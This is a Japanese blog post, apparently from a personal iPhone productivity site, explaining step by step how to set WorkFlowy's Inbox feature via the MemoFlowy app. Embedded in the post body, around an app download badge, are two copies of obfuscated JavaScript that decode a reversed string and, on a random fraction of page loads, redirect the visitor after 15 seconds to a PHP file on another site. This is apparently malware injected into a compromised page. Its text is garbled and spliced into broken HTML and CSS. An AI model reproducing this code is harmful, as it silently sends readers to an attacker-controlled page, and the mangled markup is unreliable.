Sumirexxx

今日もiPhone片手に出かけます

MemoFlowyから開いて使うWorkFlowyのInbox機能を使ってみる

iPhone WEBツール workflowy

Inbox機能

MemoFlowyから開くWorkFlowyのInbox機能ってどうやって使うんだろう?と思ったのがこの記事を書こうと思ったきっかけです。

同じくブックマーク機能というものもありますが、今回はInboxの使い方を説明します。

MemoFlowyから開くWorkFlowyのInbox機能を設定すると、WorkFlowyを開いた時に、常にInboxに指定したトピックが開くようになります。

なんでこんな回りくどい言い方をするかというと、純正のWorkFlowyから開くとブックマーク機能がなくて混乱してしまうかもしれないからです。

MemoFlowyアプリ経由でWorkFlowyを開くことで、Inbox機能を使うことができるので、ここだけは注意してください。

$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der-radius: 20px 20px 20px 20px;-moz-border-radius: 20px 20px 20px 20px;-webkit-border-radius: 20px 20px 20px 20px;box-shadow: 1px 4px 6px 1px #999999;-moz-box-shadow: 1px 4px 6px 1px #999999;-webkit-box-shadow: 1px 4px 6px 1px #999999;margin: -5px 15px 1px 5px;”> MemoFlowy
カテゴリ: 仕事効率化, ユーティリティ

$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.rdelay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}sample/images/apri_downloadbutton.gif” alt=”アプリをダウンロードする” width=”280″ height=”50″ />

こんな感じで使いたい

1.WorkFlowyにペーストする時に迷わない

2.適当に入れたまま放置しない

この2つを叶えるために、Inboxというなんでも入れる箱を用意するという考えではなく「普段よく使うトピックをIInboxに指定する」という方法で使ってみることにしました。

MemoFlowyを開く

MemoFlowyからWorkFlowyを開きます。

好きなトピックを選択する

自分のWorkFlowyにあるトピックを選んでもいいし、新しくトピックを作ってもOKです。

開いた時に常に開きたいトピックを表示しておきます。

例では「WorkFlowy>idea」を表示しています。

WorkFlowy左下のブックマークをタップ

自分の好みのトピックを選択した画面のまま、左下にあるブックマークを選択します。付箋のようなアイコンです。

Inboxに設定を選択する

この画面では、

という2つの機能を設定できるようになっています。今回は「Inboxに設定」を選択してみましょう。

するとその下にある[Inbox]が、「workflowy」から指定したトピック名に変わります。

切り替わりの前後を確認します。

選択後は上方にある「戻る」で元の画面に戻り、確認のためにトップのトピックに移動しておきましょう。

確認する

WorkFlowyの一番上のトピックに戻ったら、確認のためにいちばん上の階層「workflowy」に戻します。

右下のボタンでMemoFlowyに移動します。

ここまでで、Inboxに登録する一連の流れは終了です。次からは動作確認です。

WorkFlowyを開いてみる

MemoFlowyで何かメモしてみましょう。完了したら、MemoFlowyの右下にあるWorkFlowyを選択してWorkFlowyに飛びます。

Inboxに指定したトピックがスタートになっている

移動した時、最後に戻したWorkFlowyトピック(一番上のトピック)ではなく、先ほどInboxの設定で指定したトピックがスタートになっていたら、動作確認は成功です。

Inboxを作る意味

いちばん使用頻度の高いトピックをInboxにしておけば、ペーストが少し楽になるというメリットがあると思っています。

いつもWorkFlowyの一番上のトピックからそれらしいトピックを選んで入れる必要がありません。

まとめ

Inbox機能を使うようになるには、まずはWorkFlowyの使い方に慣れたほうがいいかなと思います。

Inbox機能の良さを感じるには、WorkFlowyのトピック移動やMemoFlowyとWorkFlowy間の移動に慣れてきた頃がおすすめです。

Posted from SLPRO X for iPhone.

この記事をシェアする

<